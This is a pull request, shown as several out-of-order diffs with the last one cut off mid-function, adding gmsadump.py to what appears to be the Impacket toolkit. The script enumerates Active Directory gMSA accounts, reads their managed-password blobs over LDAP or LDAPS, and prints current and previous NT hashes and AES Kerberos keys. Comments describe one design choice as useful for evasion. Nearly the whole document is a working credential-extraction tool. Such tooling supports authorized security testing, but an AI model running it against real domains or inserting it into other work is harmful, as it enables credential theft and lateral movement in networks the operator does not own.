### PR TITLE
Add example script to enum, parse and extract gMSA passwords - gmsadump.py

### DIFF
--- a/examples/gmsadump.py
+++ b/examples/gmsadump.py
@@ -363,14 +363,15 @@ class GetGMSAPasswords:
             self.__lmhash,
             self.__nthash,
             self.__aesKey,
+            ldaps_flag=self.__useLdaps,
         )
         # ldap_login may rewrite the target host during negotiation
         self.__target = self.__ldapConn._dstHost
 
+        
         #Optionally upgrade to TLS
         if self.__useLdaps:
             try:
-                self.__ldapConn.start_tls()
                 self.__tlsActive = True
                 logging.info('STARTTLS negotiated — msDS-ManagedPassword will be retrieved.')
             except Exception as exc:

--- a/examples/gmsadump.py
+++ b/examples/gmsadump.py
@@ -10,19 +10,17 @@
 # for more information.
 #
 # Description:
-#   Queries Active Directory via LDAP to enumerate all Group Managed Service
-#   Accounts (gMSAs) and when LDAPS/TLS is available, dumps their managed
-#   password as NT hash, AES-128, and AES-256 kerberos keys.
+#   Queries Active Directory via LDAP to enumerate all or a specific/target Group Managed Service
+#   Accounts (gMSAs) and dumps their managed password as NT hash, AES-128, and AES-256 kerberos keys.
+#   Can be used to only enumerate, using the -enum flag. Additionally you can use -gmsa to specify a specific object
+#   or using wildcard.
 #
-#   Without TLS (plain LDAP) the msDS-ManagedPassword attribute is not
-#   returned by the DC, so only the ACL membership (which principals are
-#   authorised to retrieve the password) is displayed. It is possible to do this without LDAPS
-# TODO: Implement the ability to get the passwords even if theres no LDAPS as thats possible with other tools like bloodyAD
+#
 #
 # Author:
-#   Abdul Mhanni
+#   Abdul Mhanni And Alexander Chin-Lenn
 #
-# Inspired by / based on the following. I heavily took from these from actual content to formating style etc:
+# Inspired by / based on the following(Note we heavily took from these from actual content to formating style etc):
 #   Alberto Solino (@agsolino) - GetAdUsers
 #   Fowz Masood - GetADComputers
 #   micahvandeusen - gMSADumper (https://github.com/micahvandeusen/gMSADumper)
@@ -45,7 +43,7 @@ from Cryptodome.Hash import MD4
 
 from impacket import version
 from impacket.examples import logger
-from impacket.examples.utils import parse_identity, ldap_login
+from impacket.examples.utils import parse_identity
 from impacket.krb5 import constants
 from impacket.krb5.crypto import string_to_key
 from impacket.ldap import ldap, ldapasn1
@@ -133,6 +131,7 @@ class GetGMSAPasswords:
         self.__kdcIP        = cmdLineOptions.dc_ip
         self.__kdcHost      = cmdLineOptions.dc_host
         self.__useLdaps     = cmdLineOptions.use_ldaps
+        self.__enumOnly     = cmdLineOptions.enum_only
         # either a specific gMSA name (wildcards allowed) or a
         # raw LDAP filter string supplied by the operator
         self.__gmsaName     = cmdLineOptions.gmsa        #you can use 'svcWeb$' or 'svc*'
@@ -145,10 +144,10 @@ class GetGMSAPasswords:
         self.baseDN = ','.join('dc=%s' % part for part in self.__domain.split('.'))
 
         # Live connection reference — needed for secondary SID-resolution lookups
-        
         self.__ldapConn = None
 
-        # Tracks whether STARTTLS was successfully negotiated since I dont really want to access for the GMSA password unless its absolutely neccesary
+        # Tracks whether the channel is confidential (LDAPS, or NTLM session security ENCRYPT)
+        # The DC will only return msDS-ManagedPassword over a confidential channel.
         self.__tlsActive = False
 
     
@@ -215,24 +214,28 @@ class GetGMSAPasswords:
 
     def _resolve_sid(self, sid_canonical):
         
+        results = []
+
+        def _collect(item):
+            if isinstance(item, ldapasn1.SearchResultEntry):
+                results.append(item)
+
         try:
-            resp = self.__ldapConn.search(
+            self.__ldapConn.search(
+                self.baseDN,
                 searchFilter='(objectSid={})'.format(sid_canonical),
-                attributes=['sAMAccountName', 'name', 'cn', 'objectClass'],
+                attributes=['sAMAccountName', 'name', 'cn'],
+                perRecordCallback=_collect,
             )
-
-            for item in resp:
-                if not isinstance(item, ldapasn1.SearchResultEntry):
-                    continue
-
-                sam = self._attr_value(item['attributes'], 'sAMAccountName')
-                name = self._attr_value(item['attributes'], 'name')
-                cn = self._attr_value(item['attributes'], 'cn')
-
-                resolved_name = sam or name or cn
-                if resolved_name:
-                    return '{} ({})'.format(resolved_name, sid_canonical)
-
+            if results:
+                attrs = results[0]['attributes']
+                resolved = (
+                    self._attr_value(attrs, 'sAMAccountName') or
+                    self._attr_value(attrs, 'name') or
+                    self._attr_value(attrs, 'cn')
+                )
+                if resolved:
+                    return '{} ({})'.format(resolved, sid_canonical)
         except Exception as exc:
             logging.debug('SID resolution error for %s: %s', sid_canonical, exc)
 
@@ -313,8 +316,8 @@ class GetGMSAPasswords:
                     print('    [-] msDS-ManagedPassword not returned '
                           '(this account may not be authorised to read it)')
                 else:
-                    print('    [-] msDS-ManagedPassword requires LDAPS '
-                          '(use -use-ldaps or make sure TLS is enabled on the DC)')
+                    print('    [-] msDS-ManagedPassword requires a confidential channel '
+                          '(use -use-ldaps, or ensure NTLM session security is active)')
 
         except Exception as exc:
             logging.debug('Exception in processGMSAEntry()', exc_info=True)
@@ -322,17 +325,7 @@ class GetGMSAPasswords:
 
 
     def _build_GMSA_locate_filter(self):
-        """
-        here building the LDAP filter used to find gMSA objects.
-
-        If -gmsa-filter is set, we use that and force objectClass to
-        msDS-GroupManagedServiceAccount.
-
-        If -gmsa is set, we search by sAMAccountName. Wildcards are left
-        alone, and a trailing '$' is added if the caller didnt add one.
-
-        default is non of these are set and so we will return a filter that matches all gMSAs.
-        """
+        
         base = '(objectClass=msDS-GroupManagedServiceAccount)'
 
         if self.__gmsaFilter:
@@ -349,54 +342,65 @@ class GetGMSAPasswords:
        
         return '(&{})'.format(base)
 
-    def run(self):
+    def ldap_auth(self):
+        
+        target = self.__kdcIP or self.__kdcHost or self.__domain
+        self.__target = target
+
+        scheme  = 'ldaps' if self.__useLdaps else 'ldap'
+        url     = '{}://{}'.format(scheme, target)
+        basedn  = self.baseDN
+
+        logging.debug('[*] Connecting to %s', url)
+        ldapConn = ldap.LDAPConnection(url, basedn, self.__kdcIP)
+
+        if self.__doKerberos:
+            logging.debug('[*] Authenticating with Kerberos')
+            ldapConn.kerberosLogin(
+                self.__username, self.__password, self.__domain,
+                self.__lmhash, self.__nthash, self.__aesKey,
+                kdcHost=self.__kdcIP,
+            )
+        else:
+            logging.debug('[*] Authenticating with NTLM')
+            ldapConn.login(
+                self.__username, self.__password, self.__domain,
+                self.__lmhash, self.__nthash,
+            )
+
+        return ldapConn
     
-        self.__ldapConn = ldap_login(
-            self.__target,
-            self.baseDN,
-            self.__kdcIP,
-            self.__kdcHost,
-            self.__doKerberos,
-            self.__username,
-            self.__password,
-            self.__domain,
-            self.__lmhash,
-            self.__nthash,
-            self.__aesKey,
-            ldaps_flag=self.__useLdaps,
-        )
-        # ldap_login may rewrite the target host during negotiation
-        self.__target = self.__ldapConn._dstHost
+
+    def run(self):
+        
+        try:
+            self.__ldapConn = self.ldap_auth()
+        except Exception as e:
+            logging.error('Authentication failed: %s', e)
+            sys.exit(1)
 
         
-        #Optionally upgrade to TLS
+        self.__tlsActive = True
         if self.__useLdaps:
-            try:
-                self.__tlsActive = True
-                logging.info('STARTTLS negotiated — msDS-ManagedPassword will be retrieved.')
-            except Exception as exc:
-                logging.warning(
-                    'STARTTLS failed (%s). '
-                    'Only ACL membership will be shown. '
-                    'Managed passwords require a TLS-protected connection.',
-                    exc,
-                )
+            logging.info('[+] Using LDAPS (port 636).')
+        else:
+            logging.info('[+] Using plain LDAP with NTLM Sign+Seal.')
 
         logging.info('Querying %s for gMSA objects.', self.__target)
 
-        # Only request the password attribute when TLS is active as the DC will silently omit it over plain LDAP regardless.
-        # Particualrly useful for evasion as we dont want to preform uneccesary actions if it can be helped
+    
         attrs = ['sAMAccountName', 'msDS-GroupMSAMembership']
-        if self.__tlsActive:
+        if not self.__enumOnly:
             attrs.append('msDS-ManagedPassword')
 
         search_filter = self._build_GMSA_locate_filter()
         logging.debug('Search filter: %s', search_filter)
         logging.debug('Attributes requested: %s', attrs)
 
+        sc = ldap.SimplePagedResultsControl(size=100)
         try:
-            sc = ldap.SimplePagedResultsControl(size=100)
             self.__ldapConn.search(
+                self.baseDN,
                 searchFilter=search_filter,
                 attributes=attrs,
                 sizeLimit=0,
@@ -405,12 +409,9 @@ class GetGMSAPasswords:
             )
         except ldap.LDAPSearchError as exc:
             if exc.error == 0:
-        
                 logging.info('No gMSA objects found in the directory.')
             else:
                 raise
-
-        self.__ldapConn.close()
 
 
 if __name__ == '__main__':
@@ -420,8 +421,8 @@ if __name__ == '__main__':
     parser.add_argument('target', action='store', help='domain[/username[:password]]')
     parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
-    parser.add_argument('-use-ldaps', action='store_true', default=True, help='Try STARTTLS to get msDS-ManagedPassword')
-    parser.add_argument('-no-ldaps', action='store_false', dest='use_ldaps', help='Only show ACL readers')
+    parser.add_argument('-use-ldaps', action='store_true', default=False, help='Connect via LDAPS (port 636) instead of plain LDAP.')
+    parser.add_argument('-enum', action='store_true', dest='enum_only', help='ACL enumeration only show which principals can read each gMSA password, without credential extraction')
 
     group = parser.add_argument_group('targeting')
     group2 = group.add_mutually_exclusive_group()

--- a/examples/gmsadump.py
+++ b/examples/gmsadump.py
@@ -1,11 +1,5 @@
 #!/usr/bin/env python3
-# /// script
-# requires-python = ">=3.12"
-# dependencies = [
-#     "impacket",
-# ]
-# ///
-
+# 
 # Impacket - Collection of Python classes for working with network protocols.
 #
 # Copyright Fortra, LLC and its affiliated companies

--- a/examples/gmsadump.py
+++ b/examples/gmsadump.py
@@ -1,0 +1,465 @@
+#!/usr/bin/env python3
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright Fortra, LLC and its affiliated companies
+#
+# All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   Queries Active Directory via LDAP to enumerate all Group Managed Service
+#   Accounts (gMSAs) and when LDAPS/TLS is available, dumps their managed
+#   password as NT hash, AES-128, and AES-256 kerberos keys.
+#
+#   Without TLS (plain LDAP) the msDS-ManagedPassword attribute is not
+#   returned by the DC, so only the ACL membership (which principals are
+#   authorised to retrieve the password) is displayed. It is possible to do this without LDAPS
+# TODO: Implement the ability to get the passwords even if theres no LDAPS as thats possible with other tools like bloodyAD
+#
+# Author:
+#   Abdul Mhanni
+#
+# Inspired by / based on the following. I heavily took from these from actual content to formating style etc:
+#   Alberto Solino (@agsolino) - GetAdUsers
+#   Fowz Masood - GetADComputers
+#   micahvandeusen - gMSADumper (https://github.com/micahvandeusen/gMSADumper)
+#
+# References:
+#   MS-ADTS 2.2.18  MSDS-MANAGEDPASSWORD_BLOB
+#   https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/
+#
+
+from __future__ import division
+from __future__ import print_function
+from __future__ import unicode_literals
+
+import argparse
+import logging
+import sys
+from binascii import hexlify
+
+from Cryptodome.Hash import MD4
+
+from impacket import version
+from impacket.examples import logger
+from impacket.examples.utils import parse_identity, ldap_login
+from impacket.krb5 import constants
+from impacket.krb5.crypto import string_to_key
+from impacket.ldap import ldap, ldapasn1
+from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
+from impacket.structure import Structure
+
+
+
+# MS-ADTS MSDS-MANAGEDPASSWORD_BLOB parser
+# Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/
+#      section 2.2.18
+
+
+class MSDS_MANAGEDPASSWORD_BLOB(Structure):
+    """
+    Parses the binary value of the msDS-ManagedPassword LDAP attribute. The full structure is documented below for future users reference
+
+    Wire layout (all fields little-endian):
+        USHORT  Version                         must be 1
+        USHORT  Reserved
+        ULONG   Length                          total size of the blob in bytes
+        USHORT  CurrentPasswordOffset
+        USHORT  PreviousPasswordOffset          0 if no prior password exists
+        USHORT  QueryPasswordIntervalOffset
+        USHORT  UnchangedPasswordIntervalOffset
+        BYTE[]  <variable-length password / interval data>
+    """
+
+    structure = (
+        ('Version',                         '<H'),
+        ('Reserved',                        '<H'),
+        ('Length',                          '<L'),
+        ('CurrentPasswordOffset',           '<H'),
+        ('PreviousPasswordOffset',          '<H'),
+        ('QueryPasswordIntervalOffset',     '<H'),
+        ('UnchangedPasswordIntervalOffset', '<H'),
+        # Variable-length fields — populated in fromString()
+        ('CurrentPassword',                 ':'),
+        ('PreviousPassword',                ':'),
+        ('QueryPasswordInterval',           ':'),
+        ('UnchangedPasswordInterval',       ':'),
+    )
+
+    def __init__(self, data=None):
+        Structure.__init__(self, data=data)
+
+    def fromString(self, data):
+        Structure.fromString(self, data)
+
+        cur_off  = self['CurrentPasswordOffset']
+        prev_off = self['PreviousPasswordOffset']
+        qpi_off  = self['QueryPasswordIntervalOffset']
+        upi_off  = self['UnchangedPasswordIntervalOffset']
+
+        # CurrentPassword ends at PreviousPassword (if present) or QueryPasswordInterval
+        cur_end = prev_off if prev_off != 0 else qpi_off
+        self['CurrentPassword'] = self.rawData[cur_off:cur_end]
+
+        if prev_off != 0:
+            self['PreviousPassword'] = self.rawData[prev_off:qpi_off]
+        else:
+            self['PreviousPassword'] = b''
+
+        self['QueryPasswordInterval']     = self.rawData[qpi_off:upi_off]
+        self['UnchangedPasswordInterval'] = self.rawData[upi_off:]
+
+
+
+
+class GetGMSAPasswords:
+    """
+    Enumerates gMSA objects and dumps credentials from AD.
+    """
+
+    def __init__(self, username, password, domain, cmdLineOptions):
+        self.options        = cmdLineOptions
+        self.__username     = username
+        self.__password     = password
+        self.__domain       = domain
+        self.__target       = None
+        self.__lmhash       = ''
+        self.__nthash       = ''
+        self.__aesKey       = cmdLineOptions.aesKey
+        self.__doKerberos   = cmdLineOptions.k
+        self.__kdcIP        = cmdLineOptions.dc_ip
+        self.__kdcHost      = cmdLineOptions.dc_host
+        self.__useLdaps     = cmdLineOptions.use_ldaps
+        # either a specific gMSA name (wildcards allowed) or a
+        # raw LDAP filter string supplied by the operator
+        self.__gmsaName     = cmdLineOptions.gmsa        #you can use 'svcWeb$' or 'svc*'
+        self.__gmsaFilter   = cmdLineOptions.gmsa_filter # raw LDAP addon
+
+        if cmdLineOptions.hashes is not None:
+            self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
+
+        # Build the LDAP base DN from the domain FQDN
+        self.baseDN = ','.join('dc=%s' % part for part in self.__domain.split('.'))
+
+        # Live connection reference — needed for secondary SID-resolution lookups
+        
+        self.__ldapConn = None
+
+        # Tracks whether STARTTLS was successfully negotiated since I dont really want to access for the GMSA password unless its absolutely neccesary
+        self.__tlsActive = False
+
+    
+    # Static helpers that claud said would be more useful than the inline processing I previously had.
+    #Apperntly it means others who find similar situations can just copy paste the static helpers and call them instead of reimplement
+    #Credit goes to claud, thanks legend.
+
+    @staticmethod
+    def _attr_value(item_attributes, attr_type):
+        """
+        Return the first decoded UTF-8 value for *attr_type* from an
+        ldapasn1 attribute list, or '' if the attribute is absent.
+        """
+        for attribute in item_attributes:
+            if str(attribute['type']) == attr_type:
+                try:
+                    return attribute['vals'][0].asOctets().decode('utf-8')
+                except Exception:
+                    return ''
+        return ''
+
+    @staticmethod
+    def _attr_raw(item_attributes, attr_type):
+        """
+        Return the raw bytes for a binary *attr_type*, or None if absent.
+        Used for msDS-ManagedPassword and msDS-GroupMSAMembership.
+        """
+        for attribute in item_attributes:
+            if str(attribute['type']) == attr_type:
+                try:
+                    return bytes(attribute['vals'][0])
+                except Exception:
+                    return None
+        return None
+
+
+    @staticmethod
+    def _nt_hash(password_bytes):
+        # password_bytes is already UTF-16LE encoded I believe so nothing more is needed
+        md4 = MD4.new()
+        md4.update(password_bytes)
+        return hexlify(md4.digest()).decode('ascii')
+
+    @staticmethod
+    def _kerberos_keys(sam, domain, password_bytes):
+        """
+        Derive AES-128 and AES-256 kerberos long term. their format is:
+
+            <DOMAIN_UPPER>host<sam_no_dollar_lower>.<domain_lower>
+        """
+        password = password_bytes.decode('utf-16-le', errors='replace').encode('utf-8')
+        #Kinda concenerd this one is not right but I have seen no evidence to suggest why this shouldnt work
+        salt = '{}host{}.{}'.format(
+            domain.upper(),
+            sam.rstrip('$').lower(),
+            domain.lower(),
+        )
+
+        aes128 = string_to_key(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, password, salt)
+        aes256 = string_to_key(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, password, salt)
+
+        return (hexlify(aes128.contents).decode('ascii'), hexlify(aes256.contents).decode('ascii'))
+
+
+    def _resolve_sid(self, sid_canonical):
+        
+        try:
+            resp = self.__ldapConn.search(
+                searchFilter='(objectSid={})'.format(sid_canonical),
+                attributes=['sAMAccountName', 'name', 'cn', 'objectClass'],
+            )
+
+            for item in resp:
+                if not isinstance(item, ldapasn1.SearchResultEntry):
+                    continue
+
+                sam = self._attr_value(item['attributes'], 'sAMAccountName')
+                name = self._attr_value(item['attributes'], 'name')
+                cn = self._attr_value(item['attributes'], 'cn')
+
+                resolved_name = sam or name or cn
+                if resolved_name:
+                    return '{} ({})'.format(resolved_name, sid_canonical)
+
+        except Exception as exc:
+            logging.debug('SID resolution error for %s: %s', sid_canonical, exc)
+
+        return sid_canonical
+
+    def _parse_gmsa_acl(self, raw_sd):
+        
+        principals = []
+        try:
+            sd   = SR_SECURITY_DESCRIPTOR(data=raw_sd)
+            aces = sd['Dacl']['Data']
+        except Exception as exc:
+            logging.debug('Failed to parse GroupMSAMembership SD: %s', exc)
+            return principals
+
+        for ace in aces:
+            try:
+                sid = ace['Ace']['Sid'].formatCanonical()
+                principals.append(self._resolve_sid(sid))
+            except Exception as exc:
+                logging.debug('ACE parse error: %s', exc)
+
+        return principals
+
+
+    def processGMSAEntry(self, item):
+
+        #Process a single LDAP SearchResultEntry representing a gMSA object.
+    
+        if not isinstance(item, ldapasn1.SearchResultEntry):
+            return
+
+        try:
+            attrs = item['attributes']
+            sam   = self._attr_value(attrs, 'sAMAccountName')
+            if not sam:
+                return
+
+            #which principals may read this account's password?
+            acl_raw    = self._attr_raw(attrs, 'msDS-GroupMSAMembership')
+            principals = []
+            if acl_raw:
+                principals = self._parse_gmsa_acl(acl_raw)
+
+            print('\n[*] Account:    {}'.format(sam))
+            if principals:
+                print('    Readable by: {}'.format(', '.join(principals)))
+            else:
+                print('    Readable by: (no principals resolved)')
+
+            # the target Managed password
+            pw_raw = self._attr_raw(attrs, 'msDS-ManagedPassword')
+            if pw_raw:
+                blob = MSDS_MANAGEDPASSWORD_BLOB()
+                blob.fromString(pw_raw)
+
+                # Strip the trailing UTF-16LE null terminator (2 bytes)
+                current_pw     = blob['CurrentPassword'][:-2]
+                nt             = self._nt_hash(current_pw)
+                aes128, aes256 = self._kerberos_keys(sam, self.__domain, current_pw)
+
+                
+                print('    {}::::{}'.format(sam, nt))
+                print('    {}:aes256-cts-hmac-sha1-96:{}'.format(sam, aes256))
+                print('    {}:aes128-cts-hmac-sha1-96:{}'.format(sam, aes128))
+
+                # Previous password (if the DC has cycled it at least once)
+                if blob['PreviousPassword']:
+                    prev_pw         = blob['PreviousPassword'][:-2]
+                    prev_nt         = self._nt_hash(prev_pw)
+                    prev128, prev256 = self._kerberos_keys(sam, self.__domain, prev_pw)
+                    print('\n    [Previous Password]')
+                    print('    {}::::{}'.format(sam, prev_nt))
+                    print('    {}:aes256-cts-hmac-sha1-96:{}'.format(sam, prev256))
+                    print('    {}:aes128-cts-hmac-sha1-96:{}'.format(sam, prev128))
+            else:
+                if self.__tlsActive:
+                    print('    [-] msDS-ManagedPassword not returned '
+                          '(this account may not be authorised to read it)')
+                else:
+                    print('    [-] msDS-ManagedPassword requires LDAPS '
+                          '(use -use-ldaps or make sure TLS is enabled on the DC)')
+
+        except Exception as exc:
+            logging.debug('Exception in processGMSAEntry()', exc_info=True)
+            logging.error('Skipping item, cannot process due to error %s', str(exc))
+
+
+    def _build_GMSA_locate_filter(self):
+        """
+        here building the LDAP filter used to find gMSA objects.
+
+        If -gmsa-filter is set, we use that and force objectClass to
+        msDS-GroupManagedServiceAccount.
+
+        If -gmsa is set, we search by sAMAccountName. Wildcards are left
+        alone, and a trailing '$' is added if the caller didnt add one.
+
+        default is non of these are set and so we will return a filter that matches all gMSAs.
+        """
+        base = '(objectClass=msDS-GroupManagedServiceAccount)'
+
+        if self.__gmsaFilter:
+            
+            return '(&{}{})'.format(base, self.__gmsaFilter)
+
+        if self.__gmsaName:
+            name = self.__gmsaName
+            # Append the computer-account '$' suffix if the caller omitted it and the name is not a wildcard pattern
+            if not name.endswith('$') and '*' not in name:
+                name += '$'
+            return '(&{}(sAMAccountName={}))'.format(base, name)
+
+       
+        return '(&{})'.format(base)
+
+    def run(self):
+    
+        self.__ldapConn = ldap_login(
+            self.__target,
+            self.baseDN,
+            self.__kdcIP,
+            self.__kdcHost,
+            self.__doKerberos,
+            self.__username,
+            self.__password,
+            self.__domain,
+            self.__lmhash,
+            self.__nthash,
+            self.__aesKey,
+        )
+        # ldap_login may rewrite the target host during negotiation
+        self.__target = self.__ldapConn._dstHost
+
+        #Optionally upgrade to TLS
+        if self.__useLdaps:
+            try:
+                self.__ldapConn.start_tls()
+                self.__tlsActive = True
+                logging.info('STARTTLS negotiated — msDS-ManagedPassword will be retrieved.')
+            except Exception as exc:
+                logging.warning(
+                    'STARTTLS failed (%s). '
+                    'Only ACL membership will be shown. '
+                    'Managed passwords require a TLS-protected connection.',
+                    exc,
+                )
+
+        logging.info('Querying %s for gMSA objects.', self.__target)
+
+        # Only request the password attribute when TLS is active as the DC will silently omit it over plain LDAP regardless.
+        # Particualrly useful for evasion as we dont want to preform uneccesary actions if it can be helped
+        attrs = ['sAMAccountName', 'msDS-GroupMSAMembership']
+        if self.__tlsActive:
+            attrs.append('msDS-ManagedPassword')
+
+        search_filter = self._build_GMSA_locate_filter()
+        logging.debug('Search filter: %s', search_filter)
+        logging.debug('Attributes requested: %s', attrs)
+
+        try:
+            sc = ldap.SimplePagedResultsControl(size=100)
+            self.__ldapConn.search(
+                searchFilter=search_filter,
+                attributes=attrs,
+                sizeLimit=0,
+                searchControls=[sc],
+                perRecordCallback=self.processGMSAEntry,
+            )
+        except ldap.LDAPSearchError as exc:
+            if exc.error == 0:
+        
+                logging.info('No gMSA objects found in the directory.')
+            else:
+                raise
+
+        self.__ldapConn.close()
+
+
+if __name__ == '__main__':
+    print(version.BANNER)
+
+    parser = argparse.ArgumentParser(add_help=True, description='Queries target domain for gMSA data')
+    parser.add_argument('target', action='store', help='domain[/username[:password]]')
+    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
+    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
+    parser.add_argument('-use-ldaps', action='store_true', default=True, help='Try STARTTLS to get msDS-ManagedPassword')
+    parser.add_argument('-no-ldaps', action='store_false', dest='use_ldaps', help='Only show ACL readers')
+
+    group = parser.add_argument_group('targeting')
+    group2 = group.add_mutually_exclusive_group()
+    group2.add_argument('-gmsa', action='store', metavar='account name', help='Requests data for specific gMSA account')
+    group2.add_argument('-gmsa-filter', action='store', metavar='LDAP filter', help='Custom LDAP filter')
+
+    group = parser.add_argument_group('authentication')
+    group.add_argument('-hashes', action='store', metavar='LMHASH:NTHASH', help='NTLM hashes, format is LMHASH:NTHASH')
+    group.add_argument('-no-pass', action='store_true', help='don\'t ask for password (useful for -k)')
+    group.add_argument('-k', action='store_true', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
+    group.add_argument('-aesKey', action='store', metavar='hex key', help='AES key to use for Kerberos Authentication (128 or 256 bits)')
+
+    group = parser.add_argument_group('connection')
+    group.add_argument('-dc-ip', action='store', metavar='ip address', help='IP Address of the domain controller')
+    group.add_argument('-dc-host', action='store', metavar='hostname', help='Hostname of the domain controller')
+
+    if len(sys.argv) == 1:
+        parser.print_help()
+        sys.exit(1)
+
+    options = parser.parse_args()
+    logger.init(options.ts, options.debug)
+
+    if options.gmsa_filter is not None:
+        if options.gmsa_filter.startswith('(') is False:
+            logging.critical('Bad LDAP filter')
+            sys.exit(1)
+
+    domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)
+
+    if domain is None or domain == '':
+        logging.critical('Domain should be specified!')
+        sys.exit(1)
+
+    try:
+        executer = GetGMSAPasswords(username, password, domain, options)
+        executer.run()
+    except Exception:
+        if logging.getLogger().level == logging.DEBUG:
+            import traceback
+            traceback.print_exc()
+        logging.error('Error')

--- a/examples/gmsadump.py
+++ b/examples/gmsadump.py
@@ -1,4 +1,11 @@
 #!/usr/bin/env python3
+# /// script
+# requires-python = ">=3.12"
+# dependencies = [
+#     "impacket",
+# ]
+# ///
+
 # Impacket - Collection of Python classes for working with network protocols.
 #
 # Copyright Fortra, LLC and its affiliated companies
@@ -14,17 +21,21 @@
 #   Accounts (gMSAs) and dumps their managed password as NT hash, AES-128, and AES-256 kerberos keys.
 #   Can be used to only enumerate, using the -enum flag. Additionally you can use -gmsa to specify a specific object
 #   or using wildcard.
+#   
+#   There are many differences between this and the original gMSADumper, including the ability to chose to enum all or a specific gmsa, use impackets
+#   logic for cred extraction, using impackets ldap implementation to get the managedblob over LDAP instead of only LDAPS, and being able to selectively
+#   choose which gmsa objects credintial you want. 
 #
 #
 #
 # Author:
 #   Abdul Mhanni And Alexander Chin-Lenn
 #
-# Inspired by / based on the following(Note we heavily took from these from actual content to formating style etc):
+# Inspired by / based on the following:
 #   Alberto Solino (@agsolino) - GetAdUsers
 #   Fowz Masood - GetADComputers
 #   micahvandeusen - gMSADumper (https://github.com/micahvandeusen/gMSADumper)
-#
+# 
 # References:
 #   MS-ADTS 2.2.18  MSDS-MANAGEDPASSWORD_BLOB
 #   https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/
@@ -37,15 +48,13 @@ from __future__ import unicode_literals
 import argparse
 import logging
 import sys
+
 from binascii import hexlify
-
-from Cryptodome.Hash import MD4
-
 from impacket import version
 from impacket.examples import logger
 from impacket.examples.utils import parse_identity
 from impacket.krb5 import constants
-from impacket.krb5.crypto import string_to_key
+from impacket.krb5.crypto import string_to_key, generate_kerberos_keys
 from impacket.ldap import ldap, ldapasn1
 from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
 from impacket.structure import Structure
@@ -129,9 +138,7 @@ class GetGMSAPasswords:
         self.__kdcHost = cmdLineOptions.dc_host
         self.__useLdaps = cmdLineOptions.use_ldaps
         self.__enumOnly = cmdLineOptions.enum_only
-        self.__gmsaName = (
-            cmdLineOptions.gmsa
-        )  # you can use 'svcWeb$' or 'svc*' or svcweb as will append $ if not present
+        self.__gmsaName = cmdLineOptions.gmsa # you can use 'svcWeb$' or 'svc*' or svcweb as will append $ if not present
         self.__gmsaFilter = cmdLineOptions.gmsa_filter  # raw LDAP addon
         if cmdLineOptions.hashes is not None:
             self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(":")
@@ -142,9 +149,8 @@ class GetGMSAPasswords:
         self.__tlsActive = False
         self.__discovered_sid_cache = {}
 
-    # Static helpers that claud said would be more useful than the inline processing I previously had.
-    # Apperntly it means others who find similar situations can just copy paste the static helpers and call them instead of reimplement
-    # Credit goes to AI for these.
+    # Static helpers to replace inline processing with static helpers that other scripts can pull from
+    # Credit goes to AI for these. Claud Sonnet 4.6 was used
 
     @staticmethod
     def _attr_value(item_attributes, attr_type):
@@ -175,42 +181,23 @@ class GetGMSAPasswords:
         return None
 
     @staticmethod
-    def _nt_hash(password_bytes):
-        # password_bytes is already UTF-16LE encoded I believe so nothing more is needed
-        md4 = MD4.new()
-        md4.update(password_bytes)
-        return hexlify(md4.digest()).decode("ascii")
-
-    @staticmethod
-    def _kerberos_keys(sam, domain, password_bytes):
+    def _extract_credintials_from_blob(password_bytes, sam, domain):
         """
-        Derive AES-128 and AES-256 kerberos long term. their format is:
+        Derive NT hash and AES Kerberos keys from raw UTF-16LE password bytes
+        from an msDS-ManagedPassword blob. Uses impackets impacket.krb5.crypto generate_kerberos_keys()
 
-            <DOMAIN_UPPER>host<sam_no_dollar_lower>.<domain_lower>
+        Returns (nt, aes256, aes128).
         """
-        password = password_bytes.decode("utf-16-le", errors="replace").encode("utf-8")
-        salt = "{}host{}.{}".format(
-            domain.upper(),
-            sam.rstrip("$").lower(),
-            domain.lower(),
+        ekeys = generate_kerberos_keys(
+            hex_pass=hexlify(password_bytes).decode("ascii"), user=sam, domain=domain
         )
-
-        aes128 = string_to_key(
-            constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, password, salt
-        )
-        aes256 = string_to_key(
-            constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, password, salt
-        )
-
-        return (
-            hexlify(aes128.contents).decode("ascii"),
-            hexlify(aes256.contents).decode("ascii"),
-        )
+        nt = hexlify(ekeys[int(constants.EncryptionTypes.rc4_hmac.value)].contents).decode("ascii")
+        aes256 = hexlify(ekeys[int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value)].contents).decode("ascii")
+        aes128 = hexlify(ekeys[int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value)].contents).decode("ascii")
+        return nt, aes256, aes128
 
     def _resolve_sid(self, sid_canonical):
-        if (
-            sid_canonical in self.__discovered_sid_cache
-        ):  # prevents unneccesary ldap look ups if we already have the identity details
+        if (sid_canonical in self.__discovered_sid_cache):  # prevents unneccesary ldap look ups if we already have the identity details
             return self.__discovered_sid_cache[sid_canonical]
 
         results = []
@@ -235,13 +222,12 @@ class GetGMSAPasswords:
                 )
                 if resolved:
                     formated_resolved_name = "{} ({})".format(resolved, sid_canonical)
-                    self.__discovered_sid_cache[sid_canonical] = (
-                        formated_resolved_name  # store the SID alongside the asscociated object attributes
-                    )
+                    self.__discovered_sid_cache[sid_canonical] = formated_resolved_name  # store the SID alongside the asscociated object attributes
                     return formated_resolved_name
 
